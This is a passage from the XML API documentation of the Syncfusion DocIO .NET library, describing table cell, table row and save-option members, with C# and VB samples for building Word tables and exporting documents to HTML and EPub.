        <member name="M:Syncfusion.DocIO.DLS.WTableCell.GetVerticalMergeStartCell">
            <summary>
            Gets the V merge cell.
            </summary>
            <param name="cellindex">The cellindex.</param>
            <param name="rowindex">The rowindex.</param>
            <param name="currRow">The curr row.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableCell.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableCell.GetCellWidth">
            <summary>
            Gets the width of the cell.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableCell.GetCellLayoutingWidth">
            <summary>
            Gets the width.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableCell.GetCellStartPosition">
            <summary>
            Gets the cell start position.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableCell.GetCellEndPosition">
            <summary>
            Gets the cell end position.
            </summary>
            <param name="rowIndex">Index of the row.</param>
            <param name="cellIndex">Index of the cell.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableCell.GetHorizontalMergeEndCellIndex">
            <summary>
            Gets the index of the horizontal merge end cell.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableCell.GetLeftPadding">
            <summary>
            Returns Left Padding
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableCell.GetRightPadding">
            <summary>
            Returns Right Padding
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableCell.GetTopPadding">
            <summary>
            Returns Top Padding
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableCell.GetBottomPadding">
            <summary>
            Returns Bottom Padding
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableCell.CreateLayoutInfo">
            <summary>
            Create layout information.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableCell.IsSDTBlockContainsParagraphs(Syncfusion.DocIO.DLS.StructureDocumentTagBlock)">
            <summary>
            Check whether SDT Block contains paragraph or not.
            </summary>
            <param name="sdt"></param>
            <exclude/>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableCell.CheckFootNoteInTextBody(Syncfusion.DocIO.DLS.WTextBody)">
            <summary>
            Checks the foot note in text body.
            </summary>
            <param name="textBody">The text body.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableCell.CheckFootNoteInParagraph(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Checks the foot note in paragraph.
            </summary>
            <param name="paragraph">The paragraph.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableCell.Syncfusion#Layouting#IWidget#InitLayoutInfo">
            <summary>
            Initializing LayoutInfo value to null
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTableCell.GridSpan">
            <summary>
            Gets the number of grid columns spanned by the current cell. Read-only.
            </summary>
            <value>The <b>short</b> specifies the number of grid columns in the parent table's table grid which shall be spanned by the current cell</value>
            <remarks>GridSpan allows cells to have the appearance of being merged, as they span vertical boundaries of other cells in the table.</remarks>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTableCell.SDTCell">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTableCell.Colspan">
            <summary>
            Gets and sets the Column span
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTableCell.EntityType">
            <summary>
            Gets the type of the entity.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.EntityType"/> of the current item.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTableCell.OwnerRow">
            <summary>
            Gets the owner row of the cell. Read-only.
            </summary>
            <example>
            <code language = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load a template document
                WordDocument document = new WordDocument("Template.docx");
                //Get the table
                WTable table = document.Sections[0].Tables[0] as WTable;
                //Find the text in the table
                TextSelection selection = table.Find(new Regex("Cell"));
                WTextRange text = selection.GetAsOneRange();
                //Get the owner paragraph
                WParagraph paragraph = text.OwnerParagraph;
                //Get the owner cell
                WTableCell cell = paragraph.OwnerTextBody as WTableCell;
                //Get the index of the cell
                int index = cell.GetCellIndex();
                //Apply text direction to the next cell
                WTableRow row = cell.OwnerRow;
                row.RowFormat.BackColor = Color.LightGray;
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language ="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load a template document
                Dim document As New WordDocument("Template.docx")
                'Get the table
                Dim table As WTable = TryCast(document.Sections(0).Tables(0), WTable)
                'Find the text in the table
                Dim selection As TextSelection = table.Find(New Regex("Cell"))
                Dim text As WTextRange = selection.GetAsOneRange()
                'Get the owner paragraph
                Dim paragraph As WParagraph = text.OwnerParagraph
                'Get the owner cell
                Dim cell As WTableCell = TryCast(paragraph.OwnerTextBody, WTableCell)
                'Get the index of the cell
                Dim index As Integer = cell.GetCellIndex()
                'Apply text direction to the next cell
                Dim row As WTableRow = cell.OwnerRow
                row.RowFormat.BackColor = Color.LightGray
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTableCell.CellFormat">
            <summary>
            Gets the cell format. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTableCell.Width">
            <summary>
            Gets or sets the width(in points) of the cell.
            </summary>
            <value>The <b>float</b> that specifies the cell width.</value>
            <example>
            <code language = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load a template document
                WordDocument document = new WordDocument("Template.docx");
                //Get the table
                WTable table = document.Sections[0].Tables[0] as WTable;
                foreach (WTableRow row in table.Rows)
                {
                    foreach (WTableCell cell in row.Cells)
                    {
                        cell.Width = 100;
                    }
                }
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language ="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load a template document
                Dim document As New WordDocument("Template.docx")
                'Get the table
                Dim table As WTable = TryCast(document.Sections(0).Tables(0), WTable)
                For Each row As WTableRow In table.Rows
                	For Each cell As WTableCell In row.Cells
                		cell.Width = 100
                	Next
                Next
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTableCell.ForeColor">
            <summary>
            Gets or sets the color of the fore.
            </summary>
            <value>The color of the fore.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTableCell.TextureStyle">
            <summary>
            Gets or sets the texture style.
            </summary>
            <value>The texture style.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTableCell.CharacterFormat">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTableCell.IsFixedWidth">
            <summary>
            Gets if size of cell is fixed.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTableCell.TrackCellFormat">
            <summary>
            Gets the old cell format.
            </summary>
            <value>The old cell format.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTableCell.PreferredWidth">
            <summary>
            Gets the preferred width of the cell.
            </summary>
            <value>The preferred cell width.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTableCell.CellStartPosition">
            <summary>
            Gets the cell start position.
            </summary>
            <value>
            The cell start position.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTableCell.CellEndPosition">
            <summary>
            Gets the cell end position.
            </summary>
            <value>
            The cell end position.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTableCell.WidgetCollection">
            <summary>
            Gets the body items of the cell.
            <exclude/>
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WTableRow">
            <summary>
            Represents a table row.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WTableRow.m_cells">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableRow.#ctor(Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WTableRow"/> class with the specified 
            <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> instance.
            </summary>
            <param name="document">The <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> instance.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableRow.Clone">
            <summary>
            Creates a duplicate copy of the entity.
            </summary>
            <returns>The reference to the newly created row.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableRow.AddCell">
            <summary>
            Adds a new cell to the row.
            </summary>
            <returns>The reference to the newly added cell.</returns>
            <example>The following example illustrates how to add a cell to the row.
            <code language = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                WordDocument document = new WordDocument();
                IWSection section = document.AddSection();
                section.AddParagraph().AppendText("Price Details");
                section.AddParagraph();
                //Add a new table into Word document
                IWTable table = section.AddTable();
                //Add the first row into table
                WTableRow row = table.AddRow();
                //Add the first cell into first row 
                WTableCell cell = row.AddCell();
                cell.Width = 100;
                cell.AddParagraph().AppendText("Orange");
                //Add the second cell into first row 
                cell = row.AddCell();
                cell.Width = 100;
                cell.AddParagraph().AppendText("$30");
                //Add the second row into table
                row = table.AddRow(true, false);
                //Add the first cell into second row
                cell = row.AddCell();
                cell.Width = 100;
                cell.AddParagraph().AppendText("Apple");
                //Add the second cell into second row
                cell = row.AddCell();
                cell.Width = 100;
                cell.AddParagraph().AppendText("$50");     
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language ="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                Dim document As New WordDocument()
                Dim section As IWSection = document.AddSection()
                section.AddParagraph().AppendText("Price Details")
                section.AddParagraph()
                'Add a new table into Word document
                Dim table As IWTable = section.AddTable()
                'Add the first row into table
                Dim row As WTableRow = table.AddRow()
                'Add the first cell into first row 
                Dim cell As WTableCell = row.AddCell()
                cell.Width = 100
                cell.AddParagraph().AppendText("Orange")
                'Add the second cell into first row 
                cell = row.AddCell()
                cell.Width = 100
                cell.AddParagraph().AppendText("$30")
                'Add the second row into table
                row = table.AddRow(True, False)
                'Add the first cell into second row
                cell = row.AddCell()
                cell.Width = 100
                cell.AddParagraph().AppendText("Apple")
                'Add the second cell into second row
                cell = row.AddCell()
                cell.Width = 100
                cell.AddParagraph().AppendText("$50")
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableRow.AddCell(System.Boolean)">
            <summary>
            Adds a new cell to the row.
            </summary>
            <param name="isCopyFormat"><b>True </b>if to have format of the previous row; otherwise, <b>false</b>.</param>
            <returns>The reference to the newly added cell.</returns>
            <example>The following example illustrates how to add a cell to the row by specifying the copy format option.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                WordDocument document = new WordDocument();
                IWSection section = document.AddSection();
                section.AddParagraph().AppendText("Price Details");
                section.AddParagraph();
                //Add a new table into Word document
                IWTable table = section.AddTable();
                //Add the first row into table
                WTableRow row = table.AddRow();
                //Add the first cell into first row 
                WTableCell cell = row.AddCell();
                cell.Width = 100;
                cell.AddParagraph().AppendText("Orange");
                //Add the second cell into first row 
                cell = row.AddCell();
                cell.Width = 100;
                cell.AddParagraph().AppendText("$30");
                //Add the second row into table
                row = table.AddRow(true, false);
                //Add the first cell into second row
                cell = row.AddCell();
                cell.Width = 50;
                cell.AddParagraph().AppendText("Apple");
                //Add the second cell into second row
                cell = row.AddCell(true);
                cell.AddParagraph().AppendText("$50");     
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                Dim document As New WordDocument()
                Dim section As IWSection = document.AddSection()
                section.AddParagraph().AppendText("Price Details")
                section.AddParagraph()
                'Add a new table into Word document
                Dim table As IWTable = section.AddTable()
                'Add the first row into table
                Dim row As WTableRow = table.AddRow()
                'Add the first cell into first row 
                Dim cell As WTableCell = row.AddCell()
                cell.Width = 100
                cell.AddParagraph().AppendText("Orange")
                'Add the second cell into first row 
                cell = row.AddCell()
                cell.Width = 100
                cell.AddParagraph().AppendText("$30")
                'Add the second row into table
                row = table.AddRow(True, False)
                'Add the first cell into second row
                cell = row.AddCell()
                cell.Width = 50
                cell.AddParagraph().AppendText("Apple")
                'Add the second cell into second row
                cell = row.AddCell(True)
                cell.AddParagraph().AppendText("$50")
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
            <exception cref="T:System.ArgumentException">The number of cells must be between 1 and 63.</exception>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableRow.GetRowIndex">
            <summary>
            Returns the index of the row in the table.
            </summary>
            <returns>The zero-based index of the row.</returns>
            <example>
            <code language = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load a template document
                WordDocument document = new WordDocument("Template.docx");
                //Get the table
                WTable table = document.Sections[0].Tables[0] as WTable;
                //Find the text in the table
                TextSelection selection = table.Find(new Regex("Cell"));
                WTextRange text = selection.GetAsOneRange();
                //Get the owner paragraph
                WParagraph paragraph = text.OwnerParagraph;
                //Get the owner cell
                WTableCell cell = paragraph.OwnerTextBody as WTableCell;
                //Get the row index.
                int index = cell.OwnerRow.GetRowIndex();
                //Set height for next row
                table.Rows[index + 1].Height = 20;
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language ="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load a template document
                Dim document As New WordDocument("Template.docx")
                'Get the table
                Dim table As WTable = TryCast(document.Sections(0).Tables(0), WTable)
                'Find the text in the table
                Dim selection As TextSelection = table.Find(New Regex("Cell"))
                Dim text As WTextRange = selection.GetAsOneRange()
                'Get the owner paragraph
                Dim paragraph As WParagraph = text.OwnerParagraph
                'Get the owner cell
                Dim cell As WTableCell = TryCast(paragraph.OwnerTextBody, WTableCell)
                'Get the row index.
                Dim index As Integer = cell.OwnerRow.GetRowIndex()
                'Set height for next row
                table.Rows(index + 1).Height = 20
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableRow.IsCellWidthZero">
            <summary>
            Determines whether the width and preferred width of a cell is zero.
            </summary>
            <returns>True if cell width and preferred width is zero; Otherwise false.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableRow.UpdateCellWidthByPartitioning(System.Single)">
            <summary>
            Updates the cell width by equally partitioning available width among all the cells in a row.
            </summary>
            <param name="tableWidth">The available width for table.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableRow.AddSelf">
            <summary>
            Adds the self.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableRow.CloneImpl">
            <summary>
            Creates a duplicate copy of the entity.
            <exclude/>
            </summary>
            <returns>An <see cref="T:System.Object"/> that can be casted as <see cref="T:Syncfusion.DocIO.DLS.WTableRow"/>.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableRow.CloneRelationsTo(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.DLS.OwnerHolder)">
            <summary>
            Clones the relations for TableRow.
            </summary>
            <param name="doc"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableRow.CheckFormatOwner">
            <summary>
            Checks the format owner.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableRow.OnInsertCell(System.Int32,Syncfusion.DocIO.DLS.CellFormat)">
            <summary>
            Called when cells are inserted.
            </summary>
            <param name="index">The index.</param>
            <param name="cellFormat">The cell format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableRow.OnRemoveCell(System.Int32)">
            <summary>
            Called when cells are removed.
            </summary>
            <param name="index">The index.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableRow.GetWidthToResizeCells(System.Single)">
            <summary>
            Gets the width to resize cells.
            </summary>
            <param name="row">The row.</param>
            <param name="clientWidth">Width of the client.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableRow.GetGridBeforeAfter(Syncfusion.DocIO.DLS.PreferredWidthInfo,System.Single)">
            <summary>
            Gets the grid before after.
            </summary>
            <param name="widthInfo">The width info.</param>
            <param name="clientWidth">Width of the client.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableRow.GetRowWidth">
            <summary>
            Gets the width of the row.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableRow.GetRowWidth(System.Single@,System.Single)">
            <summary>
            Gets the preferred width of the cells in the row.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableRow.GetRowPreferredWidth(System.Single)">
            <summary>
            Gets the preferred width of the row.
            </summary>
            <param name="tableWidth">Width of the table.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableRow.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableRow.InitXDLSHolder">
            <summary>
            Registers child objects in XDSL holder.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableRow.WriteXmlContent(Syncfusion.DocIO.DLS.XML.IXDLSContentWriter)">
            <summary>
            Writes object data as inside xml element.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSContentWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableRow.ReadXmlContent(Syncfusion.DocIO.DLS.XML.IXDLSContentReader)">
            <summary>
            Reads object data from xml attributes.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSContentReader"/> object.</param>
            <returns>The value indicating the presence of xml content.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableRow.WriteXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter)">
            <summary>
            Writes object data as xml attributes.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableRow.ReadXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader)">
            <summary>
            Reads object data from xml attributes.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableRow.CreateLayoutInfo">
            <summary>
            Creates layout information.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableRow.GetFirstParagraphOfRow(Syncfusion.DocIO.DLS.WParagraph@)">
            <summary>
            Get First Paragraph of the Row
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableRow.Syncfusion#Layouting#IWidget#InitLayoutInfo">
            <summary>
            Initializing LayoutInfo value to null
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTableRow.ChildEntities">
            <summary>
            Gets the child elements of the row. Read-only
            </summary>
            <value>The collection of child elements.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTableRow.EntityType">
            <summary>
            Gets the type of the entity.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.EntityType"/> of the current item.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTableRow.Cells">
            <summary>
            Gets or sets the collection of cells in the row.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WCellCollection"/> that represents the cells in the row.</value>
            <see cref="T:Syncfusion.DocIO.DLS.WCellCollection"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.WTableCell"/>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTableRow.HeightType">
            <summary>
            Gets or sets the type of the table row height.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.TableRowHeightType"/> member that specifies the type of row height.</value>
            <seealso cref="P:Syncfusion.DocIO.DLS.WTableRow.Height"/>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTableRow.RowFormat">
            <summary>
            Gets the row format. Read-only.
            </summary>
            <seealso cref="T:Syncfusion.DocIO.DLS.RowFormat"/>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTableRow.Height">
            <summary>
            Gets or sets height of the row(in points).
            </summary>
            <value>The <b>float </b>that specifies the row height.</value>
            <example>The following example illustrates how to set the height of the row in the table.
            <code language = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument();
                IWSection section = document.AddSection();
                //Add a new table into Word document
                IWTable table = section.AddTable();
                //Set number of rows and columns
                table.ResetCells(2, 2);
                //Set row height and type.
                table.Rows[1].Height = 20;
                table.Rows[1].HeightType = TableRowHeightType.AtLeast;
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language ="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                Dim section As IWSection = document.AddSection()
                'Add a new table into Word document
                Dim table As IWTable = section.AddTable()
                'Set number of rows and columns
                table.ResetCells(2, 2)
                'Set row height and type.
                table.Rows(1).Height = 20
                table.Rows(1).HeightType = TableRowHeightType.AtLeast
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTableRow.IsHeader">
            <summary>
            Gets or sets a value indicating whether the row is a table header.
            </summary>
            <value><b>True</b> if the row is header row; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTableRow.OwnerTable">
            <summary>
            Gets the owner table.
            </summary>
            <value>The owner table.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTableRow.DataArray">
            <summary>
            Gets or sets the data array.
            </summary>
            <value>The data array.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTableRow.CharacterFormat">
            <summary>
            Gets the character format.
            </summary>
            <value>The character format.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTableRow.TrackRowFormat">
            <summary>
            Gets the old row format.
            </summary>
            <value>The old row format.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTableRow.IsDeleteRevision">
            <summary>
            Gets or sets a value indicating whether this instance is delete revision.
            </summary>
            <value>
            	if this instance is delete revision, set to <c>true</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTableRow.IsInsertRevision">
            <summary>
            Gets or sets a value indicating whether this instance is insert revision.
            </summary>
            <value>
            	if this instance is insert revision, set to <c>true</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTableRow.HasTblPrEx">
            <summary>
            Gets or sets a value indicating whether this instance has TblPrEx.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTableRow.IsKeepWithNext">
            <summary>
            Get's whether the first paragraph of the row is having KeepWithNext property set
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.SaveOptions">
             <summary>
             Represents the document saving options.
             </summary>
             <example>
             <para>The following code snippet shows how to customize Word to HTML conversion using <see cref="T:Syncfusion.DocIO.DLS.SaveOptions"/>.</para>
             <code lang="C#">
             private void Button1_Click(System.Object sender, System.EventArgs e)
             {
                 //Loads an existing document
                 WordDocument document = new WordDocument("Template.docx");
                 HTMLExport export = new HTMLExport();
                 //The images in the input document will be copied to this folder
                 document.SaveOptions.HtmlExportImagesFolder = @"D:\Data\";
                 //The headers and footers in the input will be exported
                 document.SaveOptions.HtmlExportHeadersFooters = true;
                 //Export the text form fields as editable
                 document.SaveOptions.HtmlExportTextInputFormFieldAsText = false;
                 //Set the style sheet type
                 document.SaveOptions.HtmlExportCssStyleSheetType = CssStyleSheetType.External;
                 //Set name for style sheet
                 document.SaveOptions.HtmlExportCssStyleSheetFileName = "UserDefinedFileName.css";
                 //Save the document as html file
                 export.SaveAsXhtml(document, "WordtoHtml.html");
                 document.Close();
             }
             </code>
             <code lang="VB">
             Private Sub button_Click(sender As Object, e As EventArgs)
                 'Loads an existing document
                 Dim document As New WordDocument("Template.docx")
                 Dim export As New HTMLExport()
                 'The images in the input document will be copied to this folder
                 document.SaveOptions.HtmlExportImagesFolder = "D:\Data\"
                 'The headers and footers in the input will be exported
                 document.SaveOptions.HtmlExportHeadersFooters = True
                 'Export the text form fields as editable
                 document.SaveOptions.HtmlExportTextInputFormFieldAsText = False
                 'Set the style sheet type
                 document.SaveOptions.HtmlExportCssStyleSheetType = CssStyleSheetType.External
                 'Set name for style sheet
                 document.SaveOptions.HtmlExportCssStyleSheetFileName = "UserDefinedFileName.css"
                 'Save the document as html file
                 export.SaveAsXhtml(document, "WordtoHtml.html")
                 document.Close()
             End Sub
             </code>
            <para></para>
            <para>The following code snippet shows how to customize Word to EPub file conversion using <see cref="T:Syncfusion.DocIO.DLS.SaveOptions"/>.</para>
             <code lang="C#">
             private void Button1_Click(System.Object sender, System.EventArgs e)
             {
                 //Load an existing document
                 WordDocument document = new WordDocument("Template.docx", FormatType.Docx);
                 //Export the fonts used in the document
                 document.SaveOptions.EPubExportFont = true;
                 //Export header and footer
                 document.SaveOptions.HtmlExportHeadersFooters = true;
                 //Save the document as EPub file
                 document.Save("WordToEPub.epub", FormatType.EPub);
                 //Close the document
                 document.Close();
             }
             </code>
             <code lang="VB">
             Private Sub button_Click(sender As Object, e As EventArgs)
                 'Load an existing document
                 Dim document As New WordDocument("Template.docx", FormatType.Docx)
                 'Export the fonts used in the document
                 document.SaveOptions.EPubExportFont = True
                 'Export header and footer
                 document.SaveOptions.HtmlExportHeadersFooters = True
                 'Save the document as EPub file
                 document.Save("WordToEPub.epub", FormatType.EPub)
                 'Close the document
                 document.Close()
             End Sub
             </code>
             <para></para>
             <para>The following code snippet shows how to preserve compatibility mode as in the input Word document using <see cref="T:Syncfusion.DocIO.DLS.SaveOptions"/>.</para>
             <code lang="C#">
             private void Button1_Click(System.Object sender, System.EventArgs e)
             {
                 //Load an existing document
                 WordDocument document = new WordDocument("Template.doc", FormatType.Doc);
                 //Preserve compatibility mode as in the input Word document
                 document.SaveOptions.MaintainCompatibilityMode = true;
                 //Save the document as Docx file
                 document.Save("Result.docx", FormatType.Docx);
                 //Close the document
                 document.Close();
             }
             </code>
             <code lang="VB">
             Private Sub button_Click(sender As Object, e As EventArgs)
                 'Load an existing document
                 Dim document As New WordDocument("Template.doc", FormatType.Doc)
                 'Export the fonts used in the document
                 document.SaveOptions.EPubExportFont = True
                 'Preserve compatibility mode as in the input Word document
                 document.SaveOptions.MaintainCompatibilityMode = True
                 'Save the document as Docx file
                 document.Save("Result.docx", FormatType.Docx)
                 'Close the document
                 document.Close()
             End Sub
             </code>
             </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.SaveOptions.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.SaveOptions.FontFiles">
            <summary>
            Gets of sets the font file references
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.SaveOptions.EPubExportFont">
            <summary>
            Gets or sets a value indicating whether the font should be embedded in EPub.
            </summary>
            <value><b>True</b> if the font should be embedded in EPub; otherwise, <b>false</b>.</value>
            <remarks>This property is not supported in MVC6 and Xamarin application.</remarks>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.SaveOptions.EPubHeadingLevels">
            <summary>
            Gets or sets number of heading levels for EPub format
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.SaveOptions.HtmlExportCssStyleSheetType">
            <summary>
            Gets or sets the type of the HTML export CSS style sheet.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.CssStyleSheetType"/> member that specifies 
            the type of the HTML export CSS style sheet.</value>
            <remarks>This property is not supported in MVC6 and Xamarin application.</remarks>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.SaveOptions.HtmlExportCssStyleSheetFileName">
            <summary>
            Gets or sets the name of the HTML export CSS style sheet file.
            </summary>
            <value>The <b>string </b> that specifies the HTML export CSS style sheet file name.</value>
            <remarks>This property is not supported in MVC6 and Xamarin application.</remarks>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.SaveOptions.HtmlExportImagesFolder">
            <summary>
            Gets or sets the HTML export images folder for extracing the images in the document.
            </summary>
            <value>The <b>string </b> that specifies the name of the images folder.</value>
            <remarks>This property is not supported in MVC6 and Xamarin application.</remarks>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.SaveOptions.HtmlExportHeadersFooters">
            <summary>
            Gets or sets a value indicating whether to include headers and footers while exporting HTML file.
            </summary>
            <value><b>True</b> if to include headers and footers; otherwise <b>false</b>.
            </value>
            <remarks>The header and footer contents in the first page of the document will 
            be exported as first and last content of the exported HTML file.</remarks>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.SaveOptions.UseContextualSpacing">
             <summary>
            Gets or sets value indicating whether the paragraph contextual spacing should be consider in HTML export.
             </summary>
